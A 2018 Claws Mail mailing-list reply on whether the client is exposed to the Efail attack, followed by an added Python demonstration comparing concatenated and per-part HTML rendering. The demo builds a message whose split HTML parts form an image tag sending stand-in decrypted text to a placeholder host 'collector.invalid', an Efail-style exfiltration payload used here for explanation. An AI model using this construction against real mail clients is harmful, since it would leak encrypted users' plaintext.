[Users] Efail: Claws Mail status

Colin Leroy colin at colino.net
Thu May 17 10:16:52 CEST 2018


On Tue, 15 May 2018 08:47:55 +0300, Shai Berger <shai at platonix.com>
wrote:

Hello,

> The main vector for using the vulnerability is HTML mail, which Claws
> does not support by default. As far as I could see, there was no
> specific reference to the HTML plugins; as far as I understand, Claws
> with an HTML plugin (like Fancy) should get the same score as, e.g.
> KMail (that is, vulnerability can be abused but requires user
> interaction to do so).

From what I understand, the Efail attack works when the MUA
concatenates multiple HTML parts for display:

    https://www.ghacks.net/2018/05/14/openpgp-and-s-mime-vulnerability-efail-discovered/

Even when using an HTML-rendering plugin like Fancy, Claws Mail only
displays one HTML part at a time and does not concatenate them.

Therefore I think it is completely safe. I'll ask the GnuPG people just
to make sure.
-- 
Colin
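
The distinction drawn in the message above (joining several HTML parts into one document versus displaying each part on its own), as an added example that is not part of the original post and not Claws Mail code. The message, the `collector.invalid` host, the stand-in plaintext and both rendering models are constructed assumptions; the check reports whether any URL a renderer would fetch contains text from another part.

```python
from email.message import EmailMessage
from html.parser import HTMLParser

# Constructed stand-in for the text of a decrypted part (assumption).
SECRET = "constructed plaintext: meet at noon"

def build_sample():
    """Constructed multipart/mixed message with three text/html parts."""
    msg = EmailMessage()
    msg.make_mixed()
    # Part 1 leaves an attribute quote open, part 3 closes it.
    for body in ('<img src="http://collector.invalid/', SECRET, '">'):
        part = EmailMessage()
        part.set_content(body, subtype="html")
        msg.attach(part)
    return msg

class UrlCollector(HTMLParser):
    """Records every src/href value a renderer would dereference."""
    def __init__(self):
        super().__init__()
        self.urls = []

    def handle_starttag(self, tag, attrs):
        self.urls += [v for k, v in attrs if k in ("src", "href") and v]

def urls_in(document):
    parser = UrlCollector()
    parser.feed(document)
    parser.close()
    return parser.urls

def render_concatenated(msg):
    """Model of a MUA that joins all HTML parts into one document."""
    return urls_in("".join(p.get_content() for p in msg.iter_parts()))

def render_per_part(msg):
    """Model of one-part-at-a-time display: each part is its own document."""
    return [u for p in msg.iter_parts() for u in urls_in(p.get_content())]

def leaks(urls):
    """True if any URL to be fetched carries text from the secret part."""
    return any(SECRET in u for u in urls)

if __name__ == "__main__":
    sample = build_sample()
    print("concatenated:", leaks(render_concatenated(sample)))
    print("per part:    ", leaks(render_per_part(sample)))
```

In the per-part model the open quote in the first part never meets the text of the second, so no complete tag is formed and no URL is collected.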